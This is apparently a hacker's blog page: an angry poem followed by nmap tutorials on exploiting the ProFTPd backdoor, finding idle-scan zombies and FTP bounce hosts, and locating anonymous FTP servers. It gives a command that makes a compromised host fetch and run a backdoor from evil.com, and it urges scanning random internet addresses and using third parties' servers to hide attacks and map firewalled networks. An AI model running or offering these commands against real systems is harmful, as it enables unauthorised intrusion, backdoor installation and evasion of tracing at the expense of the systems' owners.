Troll Science for the WIN
One does not simply… Fuck with my plans…
One does not simply… Interfere everywhere…
One does not simply… Screw with my choices…
One does not simply… Make my choices for me…
One does not simply… Decide what is best for me…
One does not simply… Manufacture a future for me…
One does not simply… Assume they know what I need…
You know who you are.
You now know I know.
I know what you are planning.
And believe you me.
I will not fucking comply.
I know what I fucking want.
I know what I fucking need.
I know what my plan is.
Just because I do not share it.
Does not mean it does not exist.
Your opinion is now null.
Your view is now void.
Do not base data on an old set.
Learn to adapt and survive.
For of you fail to learn.
Not to try and interfere.
You will suddenly discover.
The consequences… Will be severe…
And finally, please remember.
Two can play at your game… And you know not what you are playing for…
Das Computermachine! See that antenna? Yeah. It does stuff.
Obligatory Mr Paranoid Duct Tape over webcam… And mic too for some reason…
Nmap is not just limited to scanning and host-OS/service version detection and such, it also features an AWESOME scripting engine (the NSE) which uses LUA for its scripts. I hope to cover many “fun” uses of nmap’s scripting engine over the next while, though this post is going to be a bit… Edgier and more “evil” in a sense. Also VITALLY useful and important for those of you hunting down backdoored boxes!!
Every so often someone pops an open source projects SVN or such, and backdoors the source code. This source code then finds its way onto potentially millions of systems, depending on if/when the breach is detected, or the backdoor is noticed. Sometimes, someone writes an nmap script to scan for such compromised systems, and, god forbid, even exploit them!
We will be showing off the following three scripts in this post, and using it as a primer for using nmap’s scripts. (I will only be giving demo usage of one, the other two are the same and are left to the reader as an exercise.)
These scripts are intended to locate backdoored installations of ProFTPd, vsFTPd, and UnrealIRCd, respectively.
For the example, we will use: “ftp-proftpd-backdoor.nse”
This script is intended to locate backdoored installations of ProFTPd - OSVDB-ID 69562 - and tests them using the “id” command. Please note, this is regarded as a “remote root” vulnerability and was (And is) actively exploited in the wild.
root@bha:~# nmap —script ftp-proftpd-backdoor victim.tld
This simply tests for the vulnerability, using all defaults. Nothing too special, but VERY useful for quickly testing.
Using as an exploit!
This script takes an arguement that allows you to specify a custom command to run on the vulnerable system, which is VERY useful during a penetration test!
root@bha:~# nmap —script ftp-proftpd-backdoor —script-args ftp-proftpd-backdoor.cmd=”wget http://evil.com/backdoor.pl & perl backdoor.pl” victim.tld
Please note the —script-args followed by the arguement (arg=var format) showing what command to run. In this example we have it forcing the vulnerable host to download and run a backdoor. (Yes, another one. This time maybe a reverse shell, or a loader for something like Jynx Rootkit…).
Ok. Now for the real blackhats in the audience… Yes, you can scan ranges with this. Just replace target.tld with your standard CIDR range specifier… OR… For those who are less discriminate, the -iR flag and not bothering to specify a target range will simply scan IP’s at random. Further optimizations include the -p21 (only port 21) arguement, the -T5 (Insane scan speed) and -P0 (Don’t waste my time pinging!) arguements…
The other two are similar. To get information on them (an exercise best left to the reader), perhaps the following may be of assistance:
root@bha:~# nmap —script-help ftp-proftpd-backdoor
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-05-16 00:41 IST
Categories: exploit intrusive malware vuln
Tests for the presence of the ProFTPD 1.3.3c backdoor reported as OSVDB-ID 69562. This script attempts to exploit the backdoor using the innocuous <code>id</code> command by default, but that can be changed with the <code>ftp-proftpd-backdoor.cmd</code> script argument.
See? You can ask for help! Just pass the name of the script to nmap, and it will help you out using the nsedoc engine :)
Another challenge that I put out there for any aspiring evil geniuses: How about using all three scripts AT ONCE? Optimized? It CAN be done, and when I get back I will show how. Just for now… See below :P
Best regards, and a note: I likely will not be writing too much over the next couple of days, as I just turned 20 and plan on being rather hungover and TOTALLY useless for a day or so…
However, my other stuff is at http://insecurety.net/ and http://theinfodox.blogspot.com (migrating that to here…)…
Also, checking out http://blackhatacademy.org is an EXCELLENT idea!
So, having read my previous posts on Idle Scanning and FTP Bounce, you may be interested in finding useable boxes.
Now, as I suggested, you could scan for printers or other embedded devices, they make fucking AMAZING Idle Scan hosts. However, there is an nmap script here which is excellent for checking a host to see is it useable, by checking how its IPID sequence works.
ipidseq.nse is basically a test script, that tells you if you can use a host for Idle Scans. So, assuming you want a fair few zombies, lets scan 1000 hosts in the hope of finding a few good ones!
root@bha:~# nmap -iR 1000 —script ipidseq -T5 -v -oA zombies
The above scan will scan 1000 random IP addresses using the ipidseq script, testing them to see are they useable as zombies. I am using T5 here as scanning ranges slowly is BORING :P
The -oA zombies will create three “Output Files”. zombies.xml (XML format of scan), zombies.nmap (normal output), and a third “grepable” version - zombies.gnmap. You can then extract the useable hosts from said list using grep or similar, or just scroll through, copy, paste, like myself…
"So we found us some Zombies. What about those Bouncy FTP servers then?"
Well, nmap again has the solution to this problem. The ftp-bounce.nse script. We will use it in a very similar manner to the ipidseq script…
root@bha:~# nmap -iR 1000 —script ftp-bounce -T5 -v -oA bouncyFTP
This does the same as above, except instead it outputs lists of FTP servers we can “Bounce” via! Useful, no?
BONUS ROUND! Finding Anonymous FTP Servers for stashin’ yo’ warez!
So. Say you want to store/share a bunch of files and need some storage, or just like rummaging through open FTP servers (likely in search of other peoples warez and such… Never know, might find someones super secret 0day stash!).
How do we go about doing such a thing? Well, Guess what? nmap, yet again, solves this problem with the ftp-anon script.
Now, as above, you simply use it like so…
root@bha:~# nmap —script ftp-anon -T5 -iR 1000 -v -oA ftpAnon
Remember - with these you can always scan actual *ranges* instead of my “scan 1000 random hosts” idea, and this is VERY useful for auditing internal networks! Or some specific target networks… I know some web hosting firms may be VERY interested in scanning their own ranges for anonymous FTP setups to detect illegal piracy and such!
Remember, ask before you scan!
In part One and Two of this series I described various methods of evading IDS/IPS/Firewalls, and general methods of evading detection when port scanning your targets using nmap.
In this instalment I hope to give an overview of the technique called the “FTP Bounce” Scan technique, and various “interesting” uses I have had for it…
This, along with my other nmap articles, is all kind of my notes for the wiki article over at http://blackhatacademy.org - reopening soon - with lots of shiny new content and awesome stuff!
So, how does FTP Bounce work?
Well, the File Transfer Protocol, according to its RFC (RFC 959 according to nmap man pages), has a feature called the PORT command (now I may be messing up, but I THINK this is the command. Ping me if I am wrong :3 ). Basically it allows proxy FTP connections, where I can ask the FTP server I am connected to to send a file to a host/port I specify. Obviously, in order to send a file to another host/port, it has to CONNECT to said host/port. So, we can use this to get the FTP server to check is said host/port open… Seeing what I am getting at here?
We can make an arbritary FTP server port scan another server for us (IF said FTP server supports this “feature”… Which, according to nmaps man pages, many do not anymore… but still!).
Now, most of us are likely thinking “Right, so I an make random FTP servers act as “drones” during my port scans… AWESOME!”. Yes, yes you can. This puts another “hop” between you and your victim, meaning it is a shitload harder to trace it back to you! Using standard methods like -T0 and such are recommended here, to make things even sneaker. As the FTP server is not DESIGNED to be a port scanner, it is not exactly going to be stealthy… So we kind of have to rely on timing. Need I say this is TCP ports only also?
Now for the super fun part. Now the following idea, I thought was fairly original when I came up with it while walking my dog. However, upon reading the man pages for nmap (and you wondered why I was sleep deprived? I STILL AM!) I realized Fyodor had gotten there first. Years ago. Feck.
However, it is still a cool trick… So I will outline it.
Say you are scanning company.tld, and have found a FTP server on their network, but the rest of the bloody network is firewalled off. You wish to scan the inside of their network. So, you somehow have gained credentials to their FTP server (or it supports anonymous logins), and you are still wondering how to use this to scan out the insides.
Use the external FTP server as your bounce host, and ask it to scan various inside-network ranges (just use the default 10.x, 192.168.x, etc) for you until you figure out which addressing scheme they use. Then ask it to scan the whole bloody network for you! Now, you have mapped out their internal networks by simply leveraging the FTP Bounce bug in their FTP server! Awesome, no?
Using FTP Bounce (Assuming you have a vulnerable FTP that allows this, see the ftp-bounce NSE script for checking FTP servers…)
root@bha:~# nmap -T0 -b username:firstname.lastname@example.org:21 victim.tld
This uses the username “username”, the password “password”, the FTP server “ftpserver.tld” and port 21 on said server to scan victim.tld.
If the FTP server supports anonymous logins, just forget about the username:password@ part and nmap will assume it allows-anonymous. You may omit :21 if the FTP port is 21, however, some people configure FTP on wierd ports as an attempt at “security”.
So, thought up of any “fun” uses for the FTP bounce scan technique? Tell us about them! And keep an eye out for the finished Wiki article over at http://blackhatacademy.org (if I ever finish it, that is :P )
IF you want to see more of my work - http://insecurety.net or here. I occasionally update Insecurety when the fancy takes me to lovingly hand craft some HTML from my template, but, that depends. That is kind of why I have this…